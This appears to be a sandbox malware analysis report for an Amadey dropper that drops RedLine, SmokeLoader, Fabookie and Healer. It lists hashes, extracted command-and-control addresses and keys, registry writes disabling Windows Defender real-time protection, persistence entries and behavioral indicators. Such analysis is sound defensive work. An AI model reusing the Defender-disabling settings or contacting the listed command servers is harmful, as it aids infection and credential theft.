amadey | cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890

Analysis

max time kernel
150s
max time network
154s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
18/09/2023, 01:46 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe
Size

1.4MB
MD5

a3cfe7ecb313323461d04ac931dbbe5d
SHA1

1a7a63e4a84e0cb165c57db53675cfd63a83d70f
SHA256

cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890
SHA512

5d790af8eff7135a5eb3059942f0c4d70aa4835d90e71249894d71beef467c3a424250912388888fdc5e73621926b45fd11248093db16eef7125f1c8bf722be0
SSDEEP

24576:B39DsL51T3mXifh9sUVrmhlHUkHCkdbnoDs3dJ01Tkzwzw:B39DEqXoSUo7xHCkZoDudJ0mzwzw

Score

10^/10

amadey fabookie healer redline smokeloader 0305 monik backdoor google discovery dropper evasion infostealer persistence phishing spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

3.89

http://77.91.68.52/mac/index.php

http://77.91.68.78/help/index.php

Attributes

install_dir
fefffe8cea
install_file
explonde.exe
strings_key
916aae73606d7a9e02a1d3b47c199688

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

rc4.plain

1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

monik

77.91.124.82:19071

Attributes

auth_value
da7d9ea0878f5901f1f8319d34bdccea

Extracted

Family

smokeloader

Version

2022

http://77.91.68.29/fks/

rc4.i32

1
0x4b3b02b6

rc4.i32

1
0x6ea683ed

Extracted

Family

redline

Botnet

0305

185.215.113.25:10195

Attributes

auth_value
c86205ff1cc37b2da12f0190adfda52c

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral1/memory/4908-279-0x00000000032C0000-0x00000000033F1000-memory.dmp	family_fabookie
behavioral1/memory/4908-677-0x00000000032C0000-0x00000000033F1000-memory.dmp	family_fabookie

Detected google phishing page
phishing google

Detects Healer an antivirus disabler dropper 1 IoCs

resource	yara_rule
behavioral1/memory/4616-41-0x0000000000400000-0x000000000040A000-memory.dmp	healer

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Healer
Healer an antivirus disabler dropper.
dropper healer

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 20 IoCs

pid	Process
2392	z9278342.exe
2232	z6883031.exe
876	z9008345.exe
4196	z6114861.exe
4516	q1888334.exe
1036	r9900670.exe
4072	s9788652.exe
2756	t6290031.exe
1704	explonde.exe
4768	u7082745.exe
4104	w6465232.exe
2824	legota.exe
4612	explonde.exe
1240	legota.exe
4320	E5C7.exe
4420	E74F.exe
4912	ED6A.exe
4908	EF40.exe
3592	explonde.exe
784	legota.exe

Loads dropped DLL 3 IoCs

pid	Process
4160	rundll32.exe
2036	rundll32.exe
4412	regsvr32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	AppLaunch.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	z9278342.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	z6883031.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	z9008345.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	z6114861.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3684 set thread context of 3968	3684	cb31ab4eec49ab25a870ed680cc628e9d0877b60c43642a10ae7455a873bb890.exe	70
PID 4516 set thread context of 4616	4516	q1888334.exe	76
PID 1036 set thread context of 4784	1036	r9900670.exe	78
PID 4072 set thread context of 2772	4072	s9788652.exe	83
PID 4768 set thread context of 2104	4768	u7082745.exe	97

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4960	4784	WerFault.exe	78

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3468	schtasks.exe
3436	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 876a3b3ed2e9d901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 6071ff8c04ead901	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000033e30ce92b81f25a5d431cddf4287fb4e3f365240f1f738398f93667fc559951db7c18c83054989f23ea509477eca1155b221a37db52be0f322d	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = d09b98de55f0d901	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f75b5d30d2e9d901	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1dcb1d28d2e9d901	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7d027628d2e9d901	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cb621329d2e9d901	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4616	AppLaunch.exe
4616	AppLaunch.exe
2772	AppLaunch.exe
2772	AppLaunch.exe
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found
3316	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3316	Process not Found

Suspicious behavior: MapViewOfSection 11 IoCs

pid	Process
2772	AppLaunch.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
2496	MicrosoftEdgeCP.exe
